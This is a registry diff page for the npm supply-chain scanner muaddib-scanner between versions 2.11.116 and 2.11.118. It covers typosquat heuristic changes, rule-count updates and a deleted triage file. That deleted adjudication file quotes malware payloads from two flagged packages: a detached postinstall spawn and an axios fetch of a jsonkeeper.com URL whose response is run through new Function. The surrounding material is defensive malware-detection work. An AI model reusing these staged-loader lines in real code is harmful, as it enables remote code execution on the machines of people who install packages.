npm - muaddib-scanner - Versions diffs - 2.11.116 → 2.11.118 - Mend

muaddib-scanner 2.11.116 → 2.11.118

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

package/README.md +7 -7
package/package.json +1 -1
package/{self-scan-v2.11.116.json → self-scan-v2.11.118.json} +1 -1
package/src/integrations/webhook.js +1 -1
package/src/scanner/module-graph/detect-cross-file.js +1 -1
package/src/scanner/typosquat.js +28 -8
package/src/scoring.js +1 -1
package/src/sdk-destination.js +1 -1
package/audit-data/adjudication-2026-06-14.json +0 -56
package/audit-data/fpr-baseline-2026-06-14.json +0 -2648
package/src/ml/model-trees-backup.js +0 -11

package/README.md CHANGED Viewed

@@ -30,7 +30,7 @@
 npm and PyPI supply-chain attacks are exploding. Shai-Hulud compromised 25K+ repos in 2025. Existing tools detect threats but don't help you respond.
-MUAD'DIB combines **20 parallel scanners** (264 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
+MUAD'DIB combines **20 parallel scanners** (266 detection rules), a **deobfuscation engine**, **inter-module dataflow analysis**, **compound scoring** (17 compound rules), and a gVisor/Docker sandbox to detect known threats and suspicious behavioral patterns in npm and PyPI packages. An XGBoost classifier exists in the codebase but is **currently inactive** (see [Evaluation Metrics](#evaluation-metrics) → ML Classifier section).
 ---
@@ -202,9 +202,9 @@ muaddib replay                     # Ground truth validation (90/94 TPR@3, v2.11
 | Python Source (PYSRC) | Import-time / install-time RCE patterns in `__init__.py` / `setup.py` (v2.11.41 — closes TrapDoor PyPI gap) |
 | Python AST (PYAST) | Tree-sitter-Python AST with taint-aware detectors (v2.11.42+) |
-### 264 detection rules
+### 266 detection rules
-All rules (259 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v21176) for the complete rules reference.
+All rules (261 RULES + 5 PARANOID) are mapped to MITRE ATT&CK techniques. See [SECURITY.md](SECURITY.md#detection-rules-v211117) for the complete rules reference.
 ### Detected campaigns
@@ -278,7 +278,7 @@ With pre-commit framework:
 ```yaml
 repos:
   - repo: https://github.com/DNSZLSK/muad-dib
-    rev: v2.11.76
+    rev: v2.11.117
     hooks:
       - id: muaddib-scan
 ```
@@ -303,7 +303,7 @@ These are the numbers a user gets when running `muaddib scan` against npm or PyP
 | **FPR PyPI** (v2.11.48, first honest measurement) | **9.68%** (12/124 scanned, 132 total) | **Track D fixed the PyPI downloader** — removed `pip --no-binary :all:` flag (forced compile of wheel-only packages, timed out 38% of the time) + added `.whl` extraction via `extractArchive()`. Brought 42 previously-skipped giants (numpy/pandas/django/matplotlib/scikit-learn/...) into scope. All 12 FPs cluster at score 25-35: this is the cap-PyPI-35 artifact, not new rule misfires. Lifting the cap (Track E) would drop FPR PyPI to ≈0%. 8 residual fails are >500MB packages (torch, tensorflow, scipy, opencv-python, ansible…) hitting the 30s `PACK_TIMEOUT_MS`. |
 | **ADR** (Adversarial + Holdout, v2.11.48) | **96.26%** (103/107) | 67 adversarial + 40 holdout, global threshold=20. Stable vs v2.10.95. |
-**4132 tests** across 115 files. **264 rules** (259 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
+**4414 tests** across 141 files. **266 rules** (261 RULES + 5 PARANOID; v2.11.67/70 Phantom Gyp added PKG-023 + COMPOUND-017).
 **Known issues (v2.11.48):**
 - *Cap PyPI à 35/100*: Python samples plafonnent à `riskScore=35` even when `globalRiskScore=100`. Confirmed empirically — all 12 PyPI FPs at score 25-35 (flask 32, django 35, tornado 35, bottle 30, pandas 25, matplotlib 25, plotly 25, bokeh 25, pymongo 35, coverage 32, fabric 35, websockets 35). Lifting the cap will simultaneously drop FPR PyPI to ≈0% and unblock PyPI MALWARE detection at higher thresholds. Track E target.
@@ -380,7 +380,7 @@ npm test
 ### Testing
-- **4132 tests** across 115 modular test files
+- **4414 tests** across 141 modular test files
 - **56 fuzz tests** - Malformed inputs, ReDoS, unicode, binary
 - **Datadog 17K benchmark** - 14,587 confirmed malware samples (in-scope)
 - **Ground truth validation** - 96 real-world attacks (95.74% TPR@3, 88.30% TPR@20 — v2.11.48 full measure on 94 in-scope)
@@ -401,7 +401,7 @@ npm test
 - [Documentation Index](docs/INDEX.md) - All documentation in one place
 - [Evaluation Methodology](docs/EVALUATION_METHODOLOGY.md) - Experimental protocol, holdout scores
 - [Threat Model](docs/threat-model.md) - What MUAD'DIB detects and doesn't detect
-- [Security Policy](SECURITY.md) - Detection rules reference (259 rules)
+- [Security Policy](SECURITY.md) - Detection rules reference (261 rules)
 - [Security Audit](docs/SECURITY_AUDIT.md) - Bypass validation report
 - [FP Analysis](docs/EVALUATION.md) - Historical false positive analysis

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.116",
+  "version": "2.11.118",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/{self-scan-v2.11.116.json → self-scan-v2.11.118.json} RENAMED Viewed

@@ -1,6 +1,6 @@
 {
   "target": "node_modules",
-  "timestamp": "2026-06-14T17:31:14.864Z",
+  "timestamp": "2026-06-15T12:53:45.305Z",
   "threats": [
     {
       "type": "string_mutation_obfuscation",

package/src/integrations/webhook.js CHANGED Viewed

@@ -406,7 +406,7 @@ async function resolveHostWithRetry(hostname, opts = {}) {
         dns.promises.resolve4(hostname).catch(() => []),
         dns.promises.resolve6(hostname).catch(() => [])
       ]);
-    } catch (e) { lastErr = e; }
+    } catch { /* DNS threw — ipv4/ipv6 stay [], handled by the no-records path below */ }
     const all = [...ipv4, ...ipv6];
     if (all.length > 0) return { ipv4, ipv6, all };
     lastErr = new Error(`Webhook blocked: no DNS records found for ${hostname}`);

package/src/scanner/module-graph/detect-cross-file.js CHANGED Viewed

@@ -978,7 +978,7 @@ function isNetworkSinkDescriptor(sink) {
  * file references a suspicious/paste host, a public IP, or any unknown domain (so a real
  * exfil like ecto — webhook.site + direct-IP — keeps firing). The package stays visible
  * via its other (lower-severity) signals, the same way intent-graph skips SDK pairs.
- * Rationale + corpus: FPR-segment-A-diagnosis-2026-06-14.md.
+ * Rationale + corpus: chantier FPR segment A (2026-06).
  *
  * @param {Array} flows - assembled cross-file flows (main + callback + emitter)
  * @param {string} packagePath - package root, to resolve sink file content

package/src/scanner/typosquat.js CHANGED Viewed

@@ -73,6 +73,23 @@ const LEGIT_BOUNDARY_TOKENS = new Set([
   'v2', 'v3', 'v4', 'next', 'latest', 'stable', 'lts', 'legacy', 'beta', 'alpha'
 ]);
+// RT-C1-FPR (2026-06, n=61 blind adjudication → boundary-squat measured 100% FP): popular
+// packages whose names are GENERIC tech/English words appear as a legitimate TRAILING token
+// in countless real packages — class-validator, graphile-config, ansi-colors, sinon-chai,
+// react-helmet-async, swagger-ui-express, short-uuid, react-router-redux, openapi-typescript,
+// tree-sitter-c-sharp, agent-commander. Suffix boundary-squat on these is unreliable, so they
+// are NOT matched. Distinctive brand names (axios, lodash, chalk, crypto-js — incl. the
+// plain-crypto-js / secure-axios FN-guards) stay matchable. A genuine `<x>-<generic>` squat is
+// caught by its CODE (exfil/RCE + the Track-R malice floor), not by name shape (see below).
+const GENERIC_POPULAR_NAMES = new Set([
+  'validator', 'config', 'colors', 'async', 'chai', 'typescript', 'request', 'uuid',
+  'redux', 'express', 'sharp', 'commander', 'debug', 'glob', 'yaml', 'cors', 'helmet',
+  'canvas', 'immutable', 'classnames',
+  // Infra/framework brands that are also common legit trailing tokens (rate-limit-redis,
+  // connect-redis, shadcn-svelte, authentikt-svelte) — same measured-FP class, same FN floor.
+  'redis', 'svelte',
+]);
 // Packages legitimes courts ou qui ressemblent a des populaires
 const WHITELIST = new Set([
   // Packages tres courts legitimes
@@ -456,14 +473,13 @@ function findDependencyBoundarySquat(name) {
     if (lower === popular) continue;
     if (popular.includes('-')) {
-      // Multi-token popular (e.g. crypto-js): match prefix or suffix at hyphen boundary
-      let extra = null;
-      if (lower.endsWith('-' + popular)) {
-        extra = lower.slice(0, lower.length - popular.length - 1);
-      } else if (lower.startsWith(popular + '-')) {
-        extra = lower.slice(popular.length + 1);
-      }
-      if (extra === null || extra.length === 0) continue;
+      // Multi-token popular (e.g. crypto-js): a squat PREPENDS a deceptive qualifier
+      // (plain-crypto-js → endsWith). The reverse `<popular>-<suffix>` (date-fns-tz,
+      // aws-sdk-client-mock, core-js-compat) is the popular package's OWN ecosystem extension —
+      // never a squat — so the prefix-position match is dropped (2026-06 FPR fix, 100% FP).
+      if (!lower.endsWith('-' + popular)) continue;
+      const extra = lower.slice(0, lower.length - popular.length - 1);
+      if (extra.length === 0) continue;
       // Reject if extra is a legit boundary token (single token only)
       if (!extra.includes('-') && LEGIT_BOUNDARY_TOKENS.has(extra)) continue;
       return { original: POPULAR_PACKAGES[i], type: 'boundary_squat', distance: extra.length, extra };
@@ -480,6 +496,10 @@ function findDependencyBoundarySquat(name) {
       const tokens = lower.split('-');
       if (tokens.length === 1) continue;
       if (tokens[tokens.length - 1] !== popular) continue;     // popular must be the trailing token
+      // Generic-word popular (validator/config/colors/async/chai/typescript/...) is a common
+      // legitimate trailing token (class-validator, graphile-config, ansi-colors) — 100% FP in
+      // the 2026-06 measurement. Distinctive brands (axios → secure-axios FN-guard) still match.
+      if (GENERIC_POPULAR_NAMES.has(popular)) continue;
       const siblings = tokens.slice(0, -1);
       // Benign ecosystem variant if every prefix token is a legit qualifier (ts-jest, babel-jest).
       if (siblings.every(t => LEGIT_BOUNDARY_TOKENS.has(t) || isLegitimateVariant(t))) continue;

package/src/scoring.js CHANGED Viewed

@@ -1196,7 +1196,7 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
     }
   }
-  // FPR sink-coupling gate (chantier 2026-06 — FPR-baseline-2026-06-14.md). credential_regex_harvest
+  // FPR sink-coupling gate (chantier FPR 2026-06). credential_regex_harvest
   // is a weak signal alone: a credential-shaped regex co-located with a network call, with NO proof
   // the matched secret flows out and NO host-reputation check (ast.js:hasCredentialInsideRegex +
   // hasNetworkCallInFile). The blind FPR baseline measured 94.4% FP on it — it fires on nodemailer

package/src/sdk-destination.js CHANGED Viewed

@@ -88,7 +88,7 @@ function extractDomain(url) {
     // Capture only valid hostname characters so a path-less URL immediately followed by
     // a quote/paren (e.g. fetch('https://api.openai.com')) does not absorb the trailing
     // ')" into the host. Stops at /, :, ?, #, quotes, parens, etc.
-    const match = url.match(/^https?:\/\/([a-zA-Z0-9.\-]+)/i);
+    const match = url.match(/^https?:\/\/([a-zA-Z0-9.-]+)/i);
     return match ? match[1].toLowerCase() : null;
   } catch {
     return null;

package/audit-data/adjudication-2026-06-14.json DELETED Viewed

@@ -1,56 +0,0 @@
-{
-  "meta": {
-    "period": "2026-06-14",
-    "method": "blind code read of archive/ tarballs (not MUAD'DIB labels); verdict on sink reached, not signal shape",
-    "context": "Chantier FPR Etape A. Top-band suspects (daily 2026-06-14, score 145-150) + mid-band credential_regex_harvest probes (score 20). See FPR-adjudication-2026-06-14.md + tests/samples/sink-coupling-fp/MANIFEST.md",
-    "total_reviewed": 14,
-    "tally": { "MALWARE": 2, "UNCERTAIN": 1, "FP": 11 },
-    "rubric": "TP = signal coupled to a sink (remote-code exec / exfil to an anomalous host: paste-site, dyn-DNS, raw IP). FP = same signal but local build / first-party host / vendored bundle / no dataflow to sink."
-  },
-  "results": [
-    { "package": "chalk-pro@7.0.4", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
-      "reasoning": "Masquerade: published as 'chalk' but is nodemailer source + pino deps + added network deps (axios/request/socket.io-client/sqlite3). postinstall 'node lib/utils/index.js' spawns a DETACHED, fully-silenced node process running lib/utils/smtp-connection/index.js, which fetches & execs remote code. Same jsonkeeper C2 as richtext-editor-ui.",
-      "payload_quotes": ["spawn(process.execPath,[smtp-connection/index.js],{detached:true,stdio:['ignore','ignore','ignore']}).unref()", "axios.get(\"https://www.jsonkeeper.com/b/TOAAK\").then(r => new Function(\"require\", r.data.cookie)(require))"],
-      "fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
-    { "package": "richtext-editor-ui@1.0.0", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
-      "reasoning": "Name/content mismatch. postinstall.js decodes atob(jsonkeeper URL), axios.get, pipes returned code into a detached node via stdin. Pure remote staged loader. Same actor as chalk-pro.",
-      "payload_quotes": ["const s1=(await axios.get(atob('...jsonkeeper.com/b/7EBZP'))).data.content", "spawn('node',[],{detached:true,stdio:['pipe','ignore','ignore']}); child.stdin.write(s1)"],
-      "fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
-    { "package": "xzcbailz@1.0.3", "day": "2026-06-14", "score": 145, "verdict": "UNCERTAIN", "review_type": "deep",
-      "reasoning": "Baileys (WhatsApp) fork. preinstall engine-requirements.js is a benign Node-version check. 'newsletter'/'subscribe' hits are all in STOCK Baileys files (messages-recv, chats, jid-utils) -> lifecycle_newsletter_hijack likely misfired on native Baileys newsletter handling. No remote loader / exfil found. Would need a diff vs upstream Baileys to confirm an injected auto-follow.",
-      "payload_quotes": [], "fp_trigger_pattern": "baileys_fork_newsletter_misfire" },
-    { "package": "@kinoshitastudio/noa@0.1.0", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Self-hosted LOCAL web terminal (express+ws+node-pty), token-gated, path-traversal guarded. direct_ip_exfil = a hardcoded Tailscale IP in a console.log start banner, NOT an egress sink. lifecycle_hidden_payload = postinstall node-pty native rebuild.",
-      "payload_quotes": ["const tailscaleIP='100.107.218.60'; console.log(`Tailscale -> http://${tailscaleIP}:${PORT}`)"], "fp_trigger_pattern": "local_web_terminal" },
-    { "package": "@lordofdestiny/mynumber@1.5.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "C++ native addon (binding.gyp, CMakeLists, src/*.cpp, @mapbox/node-pre-gyp). install.js = node-pre-gyp prebuilt-fetch-or-build (LOCAL toolchain). No exfil/credential sink.",
-      "payload_quotes": [], "fp_trigger_pattern": "native_addon_node_pre_gyp" },
-    { "package": "mandrel@1.64.0", "day": "2026-06-14", "score": 145, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Code-quality / AI-agents CLI. 44x dynamic_import = lib/cli command lazy-loading. postinstall best-effort 'mandrel sync' (documented no-net/no-shell, exits 0). No sink.",
-      "payload_quotes": [], "fp_trigger_pattern": "cli_dynamic_import_loader" },
-    { "package": "vibes-prompt-runner@0.1.0-beta.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "WebdriverIO + VS Code extension test harness. postinstall patch-wdio.js patches its OWN node_modules (wdio-vscode-service, VS Code main.js) + local codesign. No remote fetch / exfil.",
-      "payload_quotes": [], "fp_trigger_pattern": "wdio_vscode_test_harness" },
-    { "package": "xp-gate@0.5.1", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Code-quality gate CLI with git hooks (husky-style) + multi-language adapters + AI skills. 0 runtime deps. git_hooks_injection = installs pre-commit/pre-push hooks. prepack build script. No network/credential/exfil. (scoped @boyingliu01/xp-gate is the same tool.)",
-      "payload_quotes": [], "fp_trigger_pattern": "git_hook_dev_tool" },
-    { "package": "opticore-asymmetric-cryption@1.0.0", "day": "2026-06-14", "score": 147, "verdict": "FP", "review_type": "deep",
-      "reasoning": "RSA crypto helper from a coherent vendor family (opticore-*, author guyzoum77). postinstall.mjs = cosmetic cfonts/chalk banner + 'run npx opticore-gen-keys' hint, with isDev/isCI guard. typosquat_lifecycle/dependency_typosquat_require = boundary-squat compound misfire on the family deps. No sink.",
-      "payload_quotes": ["cfonts.say('OpticoreJS',...); console.log('Run: npx opticore-gen-keys')"], "fp_trigger_pattern": "typosquat_compound_misfire" },
-    { "package": "react-markup@0.0.0-experimental", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Official React package (experimental channel), 0 deps, 0 scripts. cjs/*.development.js bundles. credential_regex_harvest + dangerous_call_eval + intent_credential_exfil all fire on the minified-ish React bundle. No sink.",
-      "payload_quotes": [], "fp_trigger_pattern": "vendor_bundle_minified" },
-    { "package": "@floless/app@0.18.1", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Local AI-app launcher (SEA build, skills, web UI). 0 deps, NO install hook. detached/silent_stealth/lifecycle_dangerous_exec = launching its OWN local server (launch.mjs). No remote exfil.",
-      "payload_quotes": [], "fp_trigger_pattern": "local_app_launcher" },
-    { "package": "@remotion/whisper-web@4.0.477", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Whisper speech-to-text WASM for Remotion. remote_code_load = downloads the GGML model from huggingface.co/ggerganov/whisper.cpp (first-party ML host). No exfil.",
-      "payload_quotes": ["https://huggingface.co/ggerganov/whisper.cpp/resolve/main/ggml-"], "fp_trigger_pattern": "ml_model_download" },
-    { "package": "@vxrn/react-native-prebuilt@1.17.11", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "Vendored React + React-Native renderers (ReactFabric-dev.js etc.) for the vxrn/One bundler. staged_payload/proxy_data_intercept/builtin_override_exfil fire on the vendored RN reconciler. 0 fetch/ws, no install hook.",
-      "payload_quotes": [], "fp_trigger_pattern": "vendored_framework_internals" },
-    { "package": "@kilocode/cli-darwin-x64@7.3.44", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
-      "reasoning": "AI coding CLI (174MB: prebuilt darwin binary + Shiki language-grammar web console assets). websocket_c2/remote_code_load/staged_binary_payload fire on the prebuilt binary + the LLM-provider catalog (opencode.ai, zenmux.ai, perplexity, cloudflare...). Not C2.",
-      "payload_quotes": [], "fp_trigger_pattern": "ai_cli_binary_catalog" }
-  ]
-}